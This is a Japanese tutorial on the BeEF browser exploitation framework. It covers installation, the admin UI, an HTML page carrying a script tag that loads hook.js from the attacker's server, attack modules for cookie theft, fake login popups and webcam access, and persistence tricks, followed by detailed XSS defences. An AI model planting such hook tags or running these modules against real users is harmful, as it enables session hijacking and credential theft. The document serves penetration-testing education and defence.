BeEF-XSS: ブラウザハッキングフレームワーク徹底解説

BeEFは「Browser Exploitation Framework」の略で、その名の通り、ウェブブラウザを悪用（Exploitation）するためのフレームワークです。従来のセキュリティツールがネットワーク境界やサーバー側の防御に注目するのに対し、BeEFはクライアントサイド、特にウェブブラウザそのものに焦点を当てます。

BeEFの主な目的は、標的となるユーザーのブラウザを「フック（hook）」することです。フックされたブラウザは、攻撃者（ペネトレーションテスター）のコマンド実行拠点（beachhead）となり、ブラウザのコンテキスト内で様々な攻撃モジュールを実行したり、さらなる攻撃の足がかりとしたりすることが可能になります。

これにより、ペネトレーションテスターは、XSSなどのクライアントサイドの脆弱性が実際にどのような影響を及ぼすのか、具体的な形で評価・実証することができます。例えば、セッション情報の窃取、キーストロークの記録、偽のログイン画面の表示、内部ネットワークへのアクセス試行などが可能になります。

BeEFを利用するには、まず環境にインストールする必要があります。最も一般的な環境はKali Linuxですが、他のLinuxディストリビューションやmacOS、Dockerなどでも動作します。

Kali Linuxでのインストール

Kali Linuxには、BeEFが`beef-xss`というパッケージ名で含まれていることが多く、簡単にインストールできます。

ターミナルを開き、以下のコマンドを実行します:

sudo apt update
sudo apt install beef-xss -y

これにより、BeEF本体と、RubyやNode.js、必要なgem（Rubyのライブラリ）などの依存関係にあるパッケージが自動的にインストールされます。

GitHubから直接インストール (推奨)

常に最新版を利用したい場合や、Kali Linux以外の環境では、公式GitHubリポジトリから直接クローンしてインストールする方法が推奨されています。

まず、BeEFが必要とする前提条件（Ruby 3.0以上、Node.js、Bundler、SQLite3など）をシステムにインストールしておく必要があります。詳細な依存関係はBeEFのドキュメントやリポジトリで確認してください。

前提条件を満たしたら、以下の手順でインストールします:

# リポジトリをクローン
git clone https://github.com/beefproject/beef.git

# BeEFディレクトリに移動
cd beef

# 必要なgemをインストール (時間がかかる場合があります)
bundle install

これでインストールは完了です。

BeEFの起動

BeEFを起動するには、インストールしたディレクトリ（Kaliの場合は`/usr/share/beef-xss/`、GitHubからクローンした場合は`beef`ディレクトリ）に移動し、以下のコマンドを実行します。

./beef

Kali Linuxで`beef-xss`パッケージをインストールした場合、以下のコマンドでも起動できます。

beef-xss

初回起動時には、管理UI用の新しいパスワードを設定するように求められることがあります。デフォルトの認証情報は `beef` / `beef` ですが、必ず変更してください。

起動すると、ターミナルに以下のような情報が表示されます。

• Web UI: 管理画面にアクセスするためのURL (通常: `http://127.0.0.1:3000/ui/panel`)
• Hook URL: ターゲットのブラウザをフックするためのJavaScriptファイルのURL (例: `http://<BeEFサーバーのIP>:3000/hook.js`)

注意: 起動時に表示されるIPアドレスやポート番号は、環境や設定によって異なる場合があります。表示された情報をよく確認してください。

管理UIへのアクセス

ウェブブラウザを開き、起動時に表示されたWeb UIのURL（例: `http://127.0.0.1:3000/ui/panel`）にアクセスします。ログイン画面が表示されるので、設定したユーザー名（デフォルト: `beef`）とパスワードを入力します。

ログインに成功すると、BeEFの管理ダッシュボードが表示されます。

• Hooked Browsers: 現在フックされているブラウザ（オンライン）と、過去にフックされたブラウザ（オフライン）がツリー形式で表示されます。
• Logs: BeEFの動作ログが表示されます。
• (ブラウザ選択後の右ペイン):
  • Details: 選択したブラウザの詳細情報（OS、ブラウザバージョン、IPアドレス、インストールされているプラグインなど）が表示されます。
  • Logs: そのブラウザに対する操作ログが表示されます。
  • Commands: 選択したブラウザに対して実行可能なモジュール（コマンド）が表示されます。
  • Rider: HTTPリクエストを操作する機能です。
  • XssRays: フックされたページ内のXSS脆弱性をスキャンする機能です。
  • Network: ネットワークトポロジーを表示する機能です。
  • Proxy: ブラウザの通信をプロキシする機能です。

ブラウザをフックする (Hooking)

BeEFの強力な機能を利用するには、まずターゲットとなるブラウザをフックする必要があります。フックは、BeEFサーバーが提供する特別なJavaScriptファイル (`hook.js`) をターゲットブラウザに読み込ませることで行います。

`hook.js`を読み込ませる最も簡単な方法は、テスト用のHTMLファイルに以下のスクリプトタグを埋め込むことです。

<!DOCTYPE html>
<html>
<head>
    <title>テストページ</title>
</head>
<body>
    <h1>BeEF フックテスト</h1>
    <p>このページを読み込むと、ブラウザがBeEFにフックされます。</p>

    <!-- BeEFのフック用スクリプト -->
    <script src="http://<BeEFサーバーのIPアドレス>:3000/hook.js"></script>
</body>
</html>

``の部分は、BeEFを起動したマシンのIPアドレス（他のマシンからアクセスする場合）または`127.0.0.1`（同じマシン上のブラウザでテストする場合）に置き換えてください。

このHTMLファイルをウェブサーバーでホストするか、ローカルファイルとしてブラウザで開くと、そのブラウザはBeEFにフックされます。管理UIの「Hooked Browsers」>「Online Browsers」に、フックされたブラウザのIPアドレスが表示されるはずです。

ブラウザをフックしたら、いよいよBeEFの真価を発揮する時です。管理UIの「Commands」タブには、フックしたブラウザに対して実行できる様々なコマンドモジュールが用意されています。

モジュールはカテゴリ別に分類されており、その内容は多岐にわたります。

カテゴリ	主な内容	例
Browser	ブラウザ自体の情報取得や操作	Cookie取得 (Get Cookies)、Webカメラ/マイクアクセス (Webcam, Get Microphone)、クリップボード窃取 (Get Clipboard)、ブラウザリダイレクト (Redirect Browser)、アラート表示 (Create Alert Dialog)
Host	ターゲットホストの情報収集	内部ネットワークスキャン (Scan Internal Network)、ポートスキャン (Port Scanner)
Social Engineering	ユーザーを騙すための機能	偽のログイン画面表示 (Pretty Theft)、クリックジャッキング (Clickjacking)、偽のFlashアップデート要求
Exploits	既知の脆弱性を利用した攻撃	特定のブラウザやプラグインの脆弱性悪用 (古いバージョンのブラウザ向けが多い)
Network	ネットワーク関連の操作	DNSトンネリング、HTTPリクエスト送信
Metasploit	Metasploit Frameworkとの連携	Metasploitのエクスプロイトをブラウザ経由で実行

モジュールの横には色付きのアイコンが表示され、そのモジュールがターゲットのブラウザで実行可能か、ユーザーに気づかれずに実行できるかなどの目安を示します。

• 緑 (Green): ターゲットで動作し、ユーザーには見えない可能性が高い。
• オレンジ (Orange): ターゲットで動作するが、ユーザーに気づかれる可能性がある (ポップアップ表示など)。
• 赤 (Red): ターゲットで動作しない可能性が高い。
• グレー (Grey): 動作未検証。

モジュールの実行方法

1. 「Hooked Browsers」からターゲットのブラウザを選択します。
2. 右側のペインで「Commands」タブを開きます。
3. 実行したいモジュールを選択します。
4. モジュールによっては、パラメータの設定が必要な場合があります（例: リダイレクト先のURL、表示するメッセージなど）。
5. 「Execute」ボタンをクリックします。

実行結果は、モジュール名の隣にある数字（実行回数）をクリックすると確認できます。

代表的なモジュールの例

• Get Cookies: 現在のドメインに関連付けられたCookieを取得します。セッションCookieが盗まれれば、セッションハイジャックにつながる可能性があります。
• Pretty Theft: 有名なウェブサイト（Gmail, Facebookなど）に似せた偽のログインポップアップを表示し、入力された認証情報を窃取します。
• Redirect Browser: ターゲットのブラウザを指定したURLに強制的にリダイレクトさせます。フィッシングサイトやマルウェア配布サイトへ誘導するために使われることがあります。
• Webcam: ユーザーに許可を求めた上で、Webカメラの映像をキャプチャします。（ユーザーの許可が必要です）
• Get Internal IP: WebRTCを利用して、ターゲットのローカルIPアドレスを取得しようと試みます。

永続化 (Persistence)

通常のフックは、ユーザーがフックされたページを離れると切断されてしまいます。攻撃の効果を持続させるためには、永続化のテクニックが必要になります。BeEFには、以下のような永続化関連のモジュールが用意されています。

• Man-in-the-Browser (MitB): ブラウザの機能を乗っ取り、ユーザーが他のページに移動してもフックを維持しようと試みます。
• Create Invisible IFrame: 非表示のIFrameを作成し、その中でフックを維持します。
• Confirm Close Tab: ユーザーがタブを閉じようとした際に確認ダイアログを表示し、閉じさせないように試みます。

また、XSS Raysモジュールで見つけた別のオリジン（ドメイン）のXSS脆弱性を利用して、そのオリジンでもブラウザをフックすることで、より広範な永続性を確保できる場合もあります。

BeEFの設定 (`config.yaml`)

BeEFの動作は、ルートディレクトリにある `config.yaml` ファイルで詳細に設定できます。主な設定項目には以下のようなものがあります。

• Credentials: 管理UIのユーザー名とパスワード
• HTTP Server: BeEFが使用するIPアドレス、ポート番号
• Network & Proxy: プロキシ設定
• Extensions: 各種拡張機能（Metasploit連携、XssRays、Proxyなど）の有効/無効、設定
• Modules: 各コマンドモジュールの有効/無効

例えば、Metasploit連携を有効にするには、`extensions` -> `metasploit` -> `enable:` を `true` に変更し、msfrpcd（Metasploit RPCデーモン）の接続情報を設定する必要があります。

BeEF API

BeEFはRESTful APIを提供しており、外部スクリプトからBeEFを自動操作することが可能です。これにより、他のツールとの連携や、特定のタスクの自動化が実現できます。APIキーは `config.yaml` で設定します。

BeEFのようなツールによる攻撃は強力ですが、適切な対策を講じることでリスクを大幅に軽減できます。防御は主に、ウェブサイト開発者側とユーザー側の両方で行う必要があります。

ウェブサイト開発者側の対策

• XSS対策の徹底: これが最も重要です。
  • 入力値検証 (Input Validation): ユーザーからの入力を受け付ける際は、期待される形式・文字種か厳格にチェックし、不正な入力を拒否します。
  • 出力時エスケープ (Output Encoding): ユーザーからの入力値をHTMLやJavaScriptとして表示する際には、必ず適切なエスケープ処理を行います。例えば、HTMLコンテキストでは `<`, `>`, `&`, `”`, `’` を `&lt;`, `&gt;`, `&amp;`, `&quot;`, `&#x27;` にエスケープします。フレームワークが提供するサニタイズ機能やテンプレートエンジンの自動エスケープ機能を活用します。
• Content Security Policy (CSP) の導入: ブラウザが読み込めるリソース（スクリプト、スタイルシート、画像など）のドメインをホワイトリスト形式で指定します。これにより、意図しないドメインからのスクリプト（例: `hook.js`）の読み込みを阻止できます。`script-src ‘self’` のように設定することで、同一オリジンからのスクリプトのみを許可できます。
• HTTPヘッダの適切な設定:
  • `X-Content-Type-Options: nosniff`: ブラウザによるMIMEタイプのスニッフィングを防止し、意図しない形式でのコンテンツ解釈を防ぎます。
  • `X-Frame-Options: DENY` または `SAMEORIGIN`: クリックジャッキング攻撃を防ぐために、他のサイトのフレーム内での表示を制限します。
• Cookieのセキュア属性設定:
  • `HttpOnly` 属性: JavaScriptからのCookieアクセスを禁止し、XSSによるCookie窃取を防ぎます。
  • `Secure` 属性: HTTPS通信時のみCookieを送信するようにします。
  • `SameSite` 属性 (`Lax` または `Strict`): CSRF攻撃を緩和します。
• 定期的な脆弱性診断: 開発したウェブアプリケーションにXSSを含む脆弱性がないか、定期的に診断ツールや専門家による診断を実施します。

ユーザー側の対策

• ブラウザとOSのアップデート: 常に最新の状態に保ち、既知の脆弱性を修正します。
• 信頼できないリンクや添付ファイルを開かない: フィッシング詐欺の基本的な対策です。怪しいメールやメッセージ内のリンクはクリックしないようにします。
• ブラウザ拡張機能の利用:
  • NoScript: ホワイトリスト形式でJavaScriptの実行を制御します。信頼できるサイト以外でのスクリプト実行をブロックできます。
  • uBlock Origin / AdBlock Plus: 広告だけでなく、悪意のあるスクリプトを配信する可能性のあるドメインからの読み込みをブロックするのに役立つ場合があります。
• 不審な動作に注意する: 予期しないポップアップが表示されたり、勝手にリダイレクトされたりした場合は、すぐにタブを閉じるなどの対応をとります。
• パスワードマネージャーの利用: 偽のログイン画面（Pretty Theftなど）を見破るのに役立ちます。パスワードマネージャーは通常、正しいドメインに対してのみ認証情報を自動入力します。

BeEF (Browser Exploitation Framework) は、ウェブブラウザの脆弱性、特にXSSの影響を評価・実証するための強力なペネトレーションテストツールです。フックしたブラウザを起点として、情報収集、セッションハイジャック、フィッシング、内部ネットワークへの探索など、多岐にわたる攻撃をシミュレートできます。

その強力さゆえに、BeEFの使用は倫理的な範囲に留め、許可されたシステムに対してのみ行う必要があります。一方で、ウェブ開発者やセキュリティ担当者にとっては、BeEFの機能を理解し、それが悪用するXSS脆弱性への対策（入力検証、出力エスケープ、CSP導入など）を徹底することが、自社のウェブサイトとユーザーを保護する上で不可欠です。

ユーザー側も、ブラウザのアップデート、不審なリンクの回避、セキュリティ拡張機能の利用などを心がけることで、リスクを低減できます。進化し続けるウェブの脅威に対して、常に知識をアップデートし、適切な対策を講じていくことが重要です。 💪